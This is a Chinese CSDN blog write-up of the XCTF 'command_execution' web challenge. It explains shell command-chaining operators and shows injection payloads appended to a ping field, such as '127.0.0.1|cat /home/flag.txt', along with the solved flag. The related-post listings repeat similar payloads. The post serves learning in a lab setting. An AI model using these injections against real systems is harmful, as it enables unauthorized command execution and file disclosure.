攻防世界-WEB:command_execution

最新推荐文章于 2024-05-11 22:25:00 发布
最新推荐文章于 2024-05-11 22:25:00 发布
阅读量205 收藏 1
点赞数 1
分类专栏: 攻防世界 文章标签: 安全 学习 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlw1275178332/article/details/129601245
版权

题目https://adworld.xctf.org.cn/challenges/problem-set-index?id=25

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

根据题目描述,我们可以推测应该是在ping命令拼接了其他命令导致文件信息的泄露。

打开场景

首先要能ping通才能有迹可寻,尝试ping127.0.0.1.

能够ping通并且有回包,那我们再试着拼接语句。

知识补充

windows 或 linux 下:

  1. command1 && command2 先执行 command1,如果为真,再执行 command2

  1. command1 | command2 只执行 command2

  1. command1 & command2 先执行 command2 后执行 command1

  1. command1 || command2 先执行 command1,如果为假,再执行 command2

命令执行漏洞(| || & && 称为 管道符)

那在这里我们使用&、&&、|都可以用来拼接

首先查看有没有文件

127.0.0.1 | ls

有个index.php文件,那接下来直接利用find查找是否存在flag文件

127.0.0.1|find / -name "flag*"

发现txt文件,直接用cat查看

127.0.0.1|cat /home/flag.txt

发现flag

cyberpeace{506e217e083b3339831a12159382c7b2}

总结:

这道题主要是掌握命令拼接的方法,和熟悉Linux命令

只会拔网线
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 command_execution 解题详析
等风来
05-21 6027
ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。2.ping+IP地址或主机域名+命令参数。3.ping+命令参数+IP地址或主机域名。
攻防世界command_executionweb简单)
my_name_is_sy的博客
05-31 318
在一个没有写waf的地方给shell命令的执行权限是真的危险啊。 这个题主要考点为shell命令的拼接。 文章中包含了几种常见的shell命令拼接方法。
攻防世界command_execution
qq_60905276的博客
11-09 5378
1.攻防世界command_execution 首先掌握命令执行漏洞(Command Execution)的知识。 命令执行漏洞即使用者可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。其造成的原因是Web服务器对用户输入命令安全检测不足(比如没加waf),导致恶意代码被执行。 ping用于确定本地主机是否能与另一台主机成功交换(发送与接收)数据包,再根据返回的信息,就可以推断TCP/IP参数是否设置正确,以及运行是否正常、网络是否通畅等 如题就是没写waf,用户输入
攻防世界-web-command_execution
最新发布
MateSnake的博客
05-11 195
攻防世界-web-command_execution
攻防世界command_execution
u010160146的博客
08-09 441
辅助工具:Kali Linux进入目标主机后,第一步工作就是查看一下磁盘中都那些东西,然后再根据文件名查看我们所关心的数据内容。WAF还是挺重要的,在本例中,执行的攻击为:代码注入攻击,还是挺有趣的,和SQL注入类似,都是拼接指令,让其执行。Kali中的WAF工具还是不会用…用Kali中的工具是否能够更加好用些一呢?
Re-post: DBMS_XPLAN : Display Oracle Execution Plans
04-23
标题“DBMS_XPLAN: 显示Oracle执行计划”是一个关于Oracle数据库系统中用于分析SQL查询执行性能的重要工具的讨论。这个工具允许用户查看SQL语句的执行计划,从而理解数据库如何处理这些语句,以及哪些操作可能影响...
background-execution-commands.rar_execution_rontab
09-23
本压缩包文件"background-execution-commands.rar_execution_rontab"聚焦于如何在Linux系统中实现后台执行命令,包括使用`crontab`、`at`、后台运行以及`nohup`命令。 首先,`crontab`是Linux系统中的一个非常重要...
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
Shreds__Fine-grained_Execution_Units_With_Private_Memory.pdf
08-07
Shreds__Fine-grained_Execution_Units_With_Private_Memory.pdf
Load-Balancing-and-Remote-Command-Execution:C语言中负载均衡和远程命令执行的有效实现
06-01
负载平衡和远程命令执行 C中负载均衡和远程命令执行的有效实现。 在负载分配/平衡和远程命令执行的 C 实现中使用套接字编程的概念已完成。 对于程序执行,需要完成以下工作: 三个终端要开一个分别给client.c, ...
攻防世界题目练习——Web引导模式(一)
qq_48550824的博客
10-09 347
真正的检验应该只有后面判断是否为jpg/png文件,而且这个属于前端校验,就是只在前端上传页面进行检测,就算检测不通过文件也会被存储,只是会在前端将按钮灰掉不让上传,因此也可以通过修改前端代码的方式来取消文件上传后缀的限制。(又去搜了搜别人的解析思考了一下,这个replace应该并不是针对文件后缀的过滤吧,可能只是为了便于数据处理而进行的替换,并不是对上传的文件名的限制)Referer是从某个A网站显示的B网站的链接来访问B网站时,访问B网站的请求包里的Referer就是A网站的域名。
command_execution(攻防世界
m0_70819573的博客
02-22 199
command1 && command2 先执行 command1,如果为真,再执行 command2。command1 || command2 先执行 command1,如果为假,再执行 command2。command1 & command2 先执行 command2 后执行 command1。command1 | command2 只执行 command2。2.可以利用字符串拼接,需要掌握有关命令执行的知识。命令执行漏洞(| || & && 称为 管道符)
攻防世界Web:comment
Light_inthe_eyes的博客
11-03 218
发帖需要登录,提示了我们账户时zhangwei,密码是zhangweixxx,果断暴力破解,得到密码是zhangwei666: 然后发帖,想找到SQL的注入点,可是就是找不到,就翻了翻源代码,在控制台中发现了关键的提示: 提示了.git源码泄露,用御剑也得到了/.git,使用githacker看代码: 没看出什么来,突然想到前面说commit丢失了,那就要将它补上,涉及git修复,给个师傅的修复脚本:git修复 <?php include "mysql.php"; session_start(); i
攻防世界-command_execution
m0_62094846的博客
10-24 5677
 ping是Windows、Unix和Linux系统下的一个命令。ping也属于一个通信协议,是TCP/IP协议的一部分。利用“ping”命令可以检查网络是否连通,可以很好地帮助我们分析和判定网络故障。应用格式:Ping空格IP地址。该命令还可以加许多参数使用,具体是键入Ping按回车即可看到详细说明。 作用:它是用来检查网络是否通畅或者网络连接速度的命令。 它所利用的原理是这样的:利用网络上机器IP地址的唯一性,给目标IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否
攻防世界 web——command_execution
XYZCG的博客
09-03 130
/ 根目录开始找 -name "flag*" 查找含有flag的文件名 * 通配符。127.0.0.1 && cat /home/flag.txt #cat是查看命令。没有waf,即web应用可能会执行输入的恶意代码,进而造成命令执行漏洞。找到了flag.txt的路径,接下来输入cat查看。输入127.0.0.1,得到。
攻防世界command_execution
qq_45955869的博客
05-24 41
攻防世界command_execution提示:涉及的知识点是命令执行漏洞。记住两个命令全局查找函数 find找到文件路径,然后cat一下就好了结束。
攻防世界-web-新手练习区(4)-command_execution
wyj_1216 House
07-02 2524
题目 Writeup 因为是ping,所以尝试 ping 127.0.0.1 可以正常执行 尝试命令拼接执行 127.0.0.1 && ls 可以正常执行 尝试找到所有的.txt文件(这里是参考大佬思路) 127.0.0.1 && find / -name "*.txt" 发现flag.txt 于是打开flag.txt文件,得到flag 127.0....
XCTF攻防世界web新手练习_ 9_command_execution
silence1_的博客
04-29 5454
XCTF攻防世界web新手练习—command_execution 题目 题目为command_execution,是命令执行的意思,可见这道题应该跟命名执行有关。 打开题目,看到一个功能框,根据题目,是用来ping功能的。 首先先尝试ping一下127.0.0.1,成功ping通,并回显执行的命令为 ping -c 3 127.0.0.1 于是我们尝试用&&符号执行多个...
controller_list: - name: fake_manipulator_controller type: $(arg fake_execution_type) joints: - JOINT1 - JOINT2 - JOINT3 - JOINT4 - JOINT5 - JOINT6 - name: fake_gripper_controller type: $(arg fake_execution_type) joints: [] initial: # Define initial robot poses per group - group: manipulator pose: home
05-19
每个控制器都有一个类型(fake_execution_type)和一组关节(joints)。fake_manipulator_controller还有6个关节,而fake_gripper_controller没有任何关节。在初始位置方面,该文件定义了一个manipulator组的home...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值